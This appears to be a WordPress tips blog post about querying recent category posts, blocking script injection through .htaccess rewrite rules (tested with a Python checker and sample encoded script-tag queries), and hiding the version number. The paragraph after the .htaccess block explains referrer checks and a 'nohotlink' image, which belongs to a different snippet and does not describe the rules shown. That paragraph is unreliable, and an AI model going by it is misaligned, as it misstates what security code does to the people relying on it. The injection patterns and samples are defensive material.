WordPress

Get Recent Posts of A Category

In WordPress projects, we sometimes need to get the recent posts of a particular category. WordPress lets you run a custom query using query_posts().

Suppose in our project, ‘News’ is a category. Now we retrieve the posts of this category using query_posts().

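<?php
// Fetch the five most recent posts in the "news" category.
query_posts('category_name=news&showposts=5&order=DESC');
echo '<ul>';
while (have_posts()) : the_post();
    // Escape the URL and the title attribute before printing them.
    echo '<li><a href="' . esc_url(get_permalink()) . '" title="' . esc_attr(get_the_title()) . '">' . get_the_title() . '</a></li>';
endwhile;
echo '</ul>';
// Restore the main query that query_posts() replaced.
wp_reset_query();
?>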

You can also get the featured images and post detail.
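<?php
// For the featured image: the function returns the <img> HTML, so echo it.
echo get_the_post_thumbnail(get_the_ID(), 'medium');

// For the post detail: get_the_content() also returns a string.
echo get_the_content();
?>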

Protect Your WordPress Site From Script Injections

Protecting dynamic websites is especially important. Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or “inject”) code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate.

Most developers always protect their GET and POST requests, but sometimes this is not enough. We should also protect our blog against script injections and any attempt to modify the PHP GLOBALS and REQUEST variables.

Solution
The following code blocks script injections and any attempts to modify the PHP GLOBALS and _REQUEST variables. Paste it in your .htaccess file (located in the root of your WordPress installation). Make sure to always back up the .htaccess file before modifying it.

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Using this code, the first thing we’ve done is check the referrer to see that it matches our blog’s URL and it is not empty. If it doesn’t, and the file has a JPG, GIF, BMP or PNG extension, then the nohotlink image is displayed instead.
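The three RewriteCond patterns in the .htaccess block can be checked offline before they go live. The following is an added example, not code from the original post: it reproduces the patterns in Python and reports which condition, if any, matches each query string. The function names and the sample query strings are constructed for illustration.

```python
import re

# The three RewriteCond patterns from the .htaccess rules above, in order.
# [NC] on the first condition maps to re.IGNORECASE; the other two are
# case-sensitive, as in the original rules.
RULES = [
    ("script-tag", re.compile(r"(\<|%3C).*script.*(\>|%3E)", re.IGNORECASE)),
    ("GLOBALS", re.compile(r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})")),
    ("_REQUEST", re.compile(r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})")),
]


def matched_rule(query_string):
    """Return the name of the first condition that matches, or None.

    Apache tests %{QUERY_STRING} as sent, without URL-decoding it, so the
    raw string is matched here too. The conditions are unanchored, which
    is what re.search() does.
    """
    for name, pattern in RULES:
        if pattern.search(query_string):
            return name
    return None


def is_forbidden(query_string):
    """True when the RewriteRule [F] flag would answer 403 for this query."""
    return matched_rule(query_string) is not None


# Constructed sample query strings (not taken from real traffic).
SAMPLES = [
    "p=42",                          # ordinary post request
    "s=%3Cscript%3Ex%3C/script%3E",  # encoded script tag
    "GLOBALS[wp_version]=1",         # attempt to set a GLOBALS entry
    "_REQUEST%5Bid%5D=1",            # encoded "[" after _REQUEST
    "s=<description>",               # harmless, but contains "script"
    "s=javascript+tutorial",         # no angle bracket, so not matched
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(f"{qs!r:35} -> {matched_rule(qs) or 'allowed'}")
```

The rules inspect only the query string, so data sent in a POST body or in cookies is outside their scope. The `s=<description>` sample is rejected because the word "description" contains "script", which is worth knowing before enabling the rules on a site with a search form.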

Remove Your WordPress Version Number

You may know WordPress automatically displays the version you are using in the head of your blog files. This is pretty harmless if your blog is always up to date with the latest version (which is certainly what you should be doing anyway). But if for some reason your blog isn’t up to date, WordPress still displays it, and hackers will learn this vital piece of information.

The solution
Paste the following line of code in the functions.php file of your theme. Save it, refresh your blog, and voila: no more WordPress version number in the header.

remove_action('wp_head', 'wp_generator');

To execute certain actions, WordPress uses a mechanism called “hooks,” which allow you to hook one function to another. The wp_generator function, which displays the WordPress version, is hooked. We can remove this hook and prevent it from executing by using the remove_action() function.